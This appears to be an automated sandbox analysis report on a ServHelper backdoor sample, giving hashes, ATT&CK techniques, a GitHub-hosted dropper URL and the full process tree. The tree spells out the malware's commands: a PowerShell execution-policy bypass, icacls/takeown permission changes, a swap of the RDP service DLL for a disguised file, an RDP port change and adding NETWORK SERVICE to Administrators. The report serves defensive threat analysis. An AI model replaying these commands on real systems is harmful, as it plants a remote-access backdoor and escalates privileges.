servhelper | aefb4a2472f0517d58cae7e5e0c9c51b4e36b39f6096dbffc6b8cc18d0be7175

Analysis

max time kernel
144s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
29-03-2024 11:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

211ca7c8d5fd20f7dcaebdbe354662be_JaffaCakes118.exe
Size

5.7MB
MD5

211ca7c8d5fd20f7dcaebdbe354662be
SHA1

1111e864f3e9d2e6879c5179c4136638b05b67c9
SHA256

aefb4a2472f0517d58cae7e5e0c9c51b4e36b39f6096dbffc6b8cc18d0be7175
SHA512

d7e6e638cdfd4792a09d671f4e61de715a63a9001283594e6c73d5a88dfc8b91d201fc19b1228b7b1a654f9abb8cf52893d3cc02aea142a1c5c7b9d3f876e24f
SSDEEP

49152:sr/U2Wrb/T/vO90dL3BmAFd4A64nsfJ1gBO55+1TEf1q7NOVuZnsm/QBrkdL+DLk:srDnOOWmAQQQQQQQQQQQQQ

Score

10^/10

servhelper backdoor discovery exploit persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 7 IoCs

Processes:

powershell.exe

flow	pid	process
25	3920	powershell.exe
28	3920	powershell.exe
31	3920	powershell.exe
35	3920	powershell.exe
37	3920	powershell.exe
39	3920	powershell.exe
41	3920	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001
Possible privilege escalation attempt 8 IoCs
exploit

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exe

pid process

3152 icacls.exe
1084 icacls.exe
3172 icacls.exe
4660 icacls.exe
3648 icacls.exe
2268 takeown.exe
4208 icacls.exe
4344 icacls.exe

pid	process
3152	icacls.exe
1084	icacls.exe
3172	icacls.exe
4660	icacls.exe
3648	icacls.exe
2268	takeown.exe
4208	icacls.exe
4344	icacls.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Loads dropped DLL 2 IoCs

Processes:

pid process

4444
4444
Modifies file permissions 1 TTPs 8 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

4660 icacls.exe
3648 icacls.exe
2268 takeown.exe
4208 icacls.exe
4344 icacls.exe
3152 icacls.exe
1084 icacls.exe
3172 icacls.exe

pid	process
4444
4444

pid	process
4660	icacls.exe
3648	icacls.exe
2268	takeown.exe
4208	icacls.exe
4344	icacls.exe
3152	icacls.exe
1084	icacls.exe
3172	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Windows\Branding\mediasrv.png	upx
C:\Windows\Branding\mediasvc.png	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

24 raw.githubusercontent.com
25 raw.githubusercontent.com
Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\system32\rfxvmt.dll powershell.exe

flow	ioc
24	raw.githubusercontent.com
25	raw.githubusercontent.com

description	ioc	process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Program Files directory 4 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe

Drops file in Windows directory 18 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\branding\shellbrd	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI7F13.tmp	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI7F34.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_n53vzy1y.wsy.ps1	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_ueazsxbf.vnf.psm1	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI7F24.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI7F45.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI7F56.tmp	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe

Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exe

pid process

1464 WMIC.exe

pid	process
1464	WMIC.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423"	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 0deb0d6e8a2fda01	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache,"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag,"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data."	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1400 = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)"	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1400 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

976 reg.exe
Runs net.exe

pid	process
976	reg.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	28	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	31	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)	1

Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2104	powershell.exe
2104	powershell.exe
3168	powershell.exe
3168	powershell.exe
4932	powershell.exe
4932	powershell.exe
4580	powershell.exe
4580	powershell.exe
2104	powershell.exe
2104	powershell.exe
2104	powershell.exe
3920	powershell.exe
3920	powershell.exe
3920	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

656
656

pid	process
656
656

Suspicious use of AdjustPrivilegeToken 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2104	powershell.exe
Token: SeDebugPrivilege	3168	powershell.exe
Token: SeDebugPrivilege	4932	powershell.exe
Token: SeDebugPrivilege	4580	powershell.exe
Token: SeRestorePrivilege	4344	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	1464	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1464	WMIC.exe
Token: SeAuditPrivilege	1464	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1464	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1464	WMIC.exe
Token: SeAuditPrivilege	1464	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1232	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1232	WMIC.exe
Token: SeAuditPrivilege	1232	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1232	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1232	WMIC.exe
Token: SeAuditPrivilege	1232	WMIC.exe
Token: SeDebugPrivilege	3920	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

211ca7c8d5fd20f7dcaebdbe354662be_JaffaCakes118.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exe

description	pid	process	target process
PID 2044 wrote to memory of 2104	2044	211ca7c8d5fd20f7dcaebdbe354662be_JaffaCakes118.exe	powershell.exe
PID 2044 wrote to memory of 2104	2044	211ca7c8d5fd20f7dcaebdbe354662be_JaffaCakes118.exe	powershell.exe
PID 2104 wrote to memory of 1688	2104	powershell.exe	csc.exe
PID 2104 wrote to memory of 1688	2104	powershell.exe	csc.exe
PID 1688 wrote to memory of 4372	1688	csc.exe	cvtres.exe
PID 1688 wrote to memory of 4372	1688	csc.exe	cvtres.exe
PID 2104 wrote to memory of 3168	2104	powershell.exe	powershell.exe
PID 2104 wrote to memory of 3168	2104	powershell.exe	powershell.exe
PID 2104 wrote to memory of 4932	2104	powershell.exe	powershell.exe
PID 2104 wrote to memory of 4932	2104	powershell.exe	powershell.exe
PID 2104 wrote to memory of 4580	2104	powershell.exe	powershell.exe
PID 2104 wrote to memory of 4580	2104	powershell.exe	powershell.exe
PID 2104 wrote to memory of 2268	2104	powershell.exe	takeown.exe
PID 2104 wrote to memory of 2268	2104	powershell.exe	takeown.exe
PID 2104 wrote to memory of 4208	2104	powershell.exe	icacls.exe
PID 2104 wrote to memory of 4208	2104	powershell.exe	icacls.exe
PID 2104 wrote to memory of 4344	2104	powershell.exe	icacls.exe
PID 2104 wrote to memory of 4344	2104	powershell.exe	icacls.exe
PID 2104 wrote to memory of 3152	2104	powershell.exe	icacls.exe
PID 2104 wrote to memory of 3152	2104	powershell.exe	icacls.exe
PID 2104 wrote to memory of 1084	2104	powershell.exe	icacls.exe
PID 2104 wrote to memory of 1084	2104	powershell.exe	icacls.exe
PID 2104 wrote to memory of 3172	2104	powershell.exe	icacls.exe
PID 2104 wrote to memory of 3172	2104	powershell.exe	icacls.exe
PID 2104 wrote to memory of 4660	2104	powershell.exe	icacls.exe
PID 2104 wrote to memory of 4660	2104	powershell.exe	icacls.exe
PID 2104 wrote to memory of 3648	2104	powershell.exe	icacls.exe
PID 2104 wrote to memory of 3648	2104	powershell.exe	icacls.exe
PID 2104 wrote to memory of 4368	2104	powershell.exe	reg.exe
PID 2104 wrote to memory of 4368	2104	powershell.exe	reg.exe
PID 2104 wrote to memory of 976	2104	powershell.exe	reg.exe
PID 2104 wrote to memory of 976	2104	powershell.exe	reg.exe
PID 2104 wrote to memory of 2336	2104	powershell.exe	reg.exe
PID 2104 wrote to memory of 2336	2104	powershell.exe	reg.exe
PID 2104 wrote to memory of 3356	2104	powershell.exe	net.exe
PID 2104 wrote to memory of 3356	2104	powershell.exe	net.exe
PID 3356 wrote to memory of 428	3356	net.exe	net1.exe
PID 3356 wrote to memory of 428	3356	net.exe	net1.exe
PID 2104 wrote to memory of 3384	2104	powershell.exe	cmd.exe
PID 2104 wrote to memory of 3384	2104	powershell.exe	cmd.exe
PID 3384 wrote to memory of 3656	3384	cmd.exe	cmd.exe
PID 3384 wrote to memory of 3656	3384	cmd.exe	cmd.exe
PID 3656 wrote to memory of 1368	3656	cmd.exe	net.exe
PID 3656 wrote to memory of 1368	3656	cmd.exe	net.exe
PID 1368 wrote to memory of 336	1368	net.exe	net1.exe
PID 1368 wrote to memory of 336	1368	net.exe	net1.exe
PID 2104 wrote to memory of 3772	2104	powershell.exe	cmd.exe
PID 2104 wrote to memory of 3772	2104	powershell.exe	cmd.exe
PID 3772 wrote to memory of 4636	3772	cmd.exe	cmd.exe
PID 3772 wrote to memory of 4636	3772	cmd.exe	cmd.exe
PID 4636 wrote to memory of 4948	4636	cmd.exe	net.exe
PID 4636 wrote to memory of 4948	4636	cmd.exe	net.exe
PID 4948 wrote to memory of 640	4948	net.exe	net1.exe
PID 4948 wrote to memory of 640	4948	net.exe	net1.exe
PID 1648 wrote to memory of 2880	1648	cmd.exe	net.exe
PID 1648 wrote to memory of 2880	1648	cmd.exe	net.exe
PID 2880 wrote to memory of 1900	2880	net.exe	net1.exe
PID 2880 wrote to memory of 1900	2880	net.exe	net1.exe
PID 4480 wrote to memory of 4056	4480	cmd.exe	net.exe
PID 4480 wrote to memory of 4056	4480	cmd.exe	net.exe
PID 4056 wrote to memory of 2120	4056	net.exe	net1.exe
PID 4056 wrote to memory of 2120	4056	net.exe	net1.exe
PID 3660 wrote to memory of 4372	3660	cmd.exe	net.exe
PID 3660 wrote to memory of 4372	3660	cmd.exe	net.exe

C:\Users\Admin\AppData\Local\Temp\211ca7c8d5fd20f7dcaebdbe354662be_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\211ca7c8d5fd20f7dcaebdbe354662be_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2044

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2104

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nvb2al1r\nvb2al1r.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:1688

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES515C.tmp" "c:\Users\Admin\AppData\Local\Temp\nvb2al1r\CSC3B066624B2AE420C8E6B3E287BE0BE1.TMP"
4⤵
PID:4372

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3168

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4932

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4580

C:\Windows\system32\takeown.exe
"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2268

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4208

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4344

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3152

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1084

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3172

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4660

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3648

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
3⤵
PID:4368

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
3⤵
- Sets DLL path for service in the registry
- Modifies registry key
PID:976

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
3⤵
PID:2336

C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
3⤵
- Suspicious use of WriteProcessMemory
PID:3356

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
4⤵
PID:428

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
3⤵
- Suspicious use of WriteProcessMemory
PID:3384

C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
4⤵
- Suspicious use of WriteProcessMemory
PID:3656

C:\Windows\system32\net.exe
net start rdpdr
5⤵
- Suspicious use of WriteProcessMemory
PID:1368

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
6⤵
PID:336

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
3⤵
- Suspicious use of WriteProcessMemory
PID:3772

C:\Windows\system32\cmd.exe
cmd /c net start TermService
4⤵
- Suspicious use of WriteProcessMemory
PID:4636

C:\Windows\system32\net.exe
net start TermService
5⤵
- Suspicious use of WriteProcessMemory
PID:4948

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
6⤵
PID:640

C:\Windows\system32\cmd.exe
